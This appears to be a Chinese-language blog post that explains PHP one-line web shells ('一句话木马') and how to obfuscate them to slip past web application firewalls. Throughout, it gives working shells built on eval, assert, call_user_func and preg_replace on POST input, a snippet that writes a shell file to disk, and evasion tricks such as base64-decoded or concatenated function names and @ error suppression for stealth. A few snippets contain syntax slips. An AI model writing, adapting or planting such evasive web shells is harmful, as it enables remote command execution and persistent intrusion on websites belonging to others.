一句话木马

2022-11-22 / 0 评论 / 14 阅读

一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。

为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了发送的命令。

通过 GET 、POST 、COOKIE 这三种方式向一个网站提交数据

一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ']  接收传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令

一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分

如:

<?php eval(@$_POST['a']); ?>
<?php assert(@$_POST['a']); ?>
<?php@call_user_func(assert,$_POST['a']);?>

注:

  call_user_func这个函数可以调用其它函数

<?php @preg_replace("/abcde/e", $_POST['a'], "abcdefg");?>

注:

  在表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行

<?php$test='<?php $a=$_POST["cmd"];assert($a); ?>';file_put_contents("Trojan.php", $test);?>

 

waf是网站的防火墙,例如安全狗就是waf的一种。

waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。

想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。

想要绕过waf,PHP小技巧

变量

<?php $a = "eval";$a(@$_POST['a']); ?>

可变变量

<?php$bb="eval";$a="bb";$aa($_POST['a']);?>
str_replace
<?php$a=str_replace("Waldo", "", "eWaldoval");$a(@$_POST['a']);?>
base64_decode
<?php$a=base64_decode("ZXZhbA==")$a($_POST['a']);?>

 字符串连接

<?php$a="e"."v";$b="a"."l";$c=$a.$b;$c($_POST['a']);?>
parse_str
<?php$str="a=eval";parse_str($str);$a($_POST['a']);?>

这些技巧每一种单独使用都不能绕过waf,但是与 第三大点提到的函数混合起来使用,就可以顺利的欺骗waf。
tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。

<?phpfunction fun(){return $_POST['a'];}@preg_replace("/test/e",fun(),"test test test");?>